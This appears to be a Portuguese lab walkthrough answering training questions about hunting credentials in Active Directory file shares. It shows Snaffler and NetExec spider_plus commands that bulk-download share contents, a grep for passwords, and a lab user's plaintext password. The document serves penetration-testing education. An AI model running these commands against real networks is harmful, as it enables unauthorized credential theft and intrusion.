Questions

1. Uma das pastas compartilhadas às quais Mendres tem acesso contém credenciais válidas de outro usuário do domínio. Qual é a senha dele?

• Encontrar recursivamente todos os arquivos e pastas acessíveis em unidades compartilhadas com o Snaffler

Snaffler.exe -s

• Encontrei a primeira credencial neste caminho \DC01.inlanefreight.local\IT\Tools\split_tunnel.txt

---

1. Como esse usuário, pesquise entre os compartilhamentos adicionais aos quais ele tem acesso e identifique a senha de um administrador de domínio. Qual é ela?

• Usei as credenciais de jbader para enumerar os compartilhamentos adicionais com nxc

nxc smb <Target Ip> -u jbader -p ILovePower333### -M spider_plus -o DOWNLOAD_FLAG=True --smb-timeout 60

• -M spider_plus Isso instrui o NetExec a executar o módulo spider_plus

• -o DOWNLOAD_FLAG=TrueEssa opção crucial instrui spider_pluso download de todos os arquivos encontrados para o nosso computador.

• Para acessar esses arquivos, navegue até o seguinte diretório:

cd /tmp/nxc_hosted/nxc_spider_plus/<target-IP>

• Podemos começar a procurar informações confidenciais, principalmente credenciais.

grep -ri "passw" .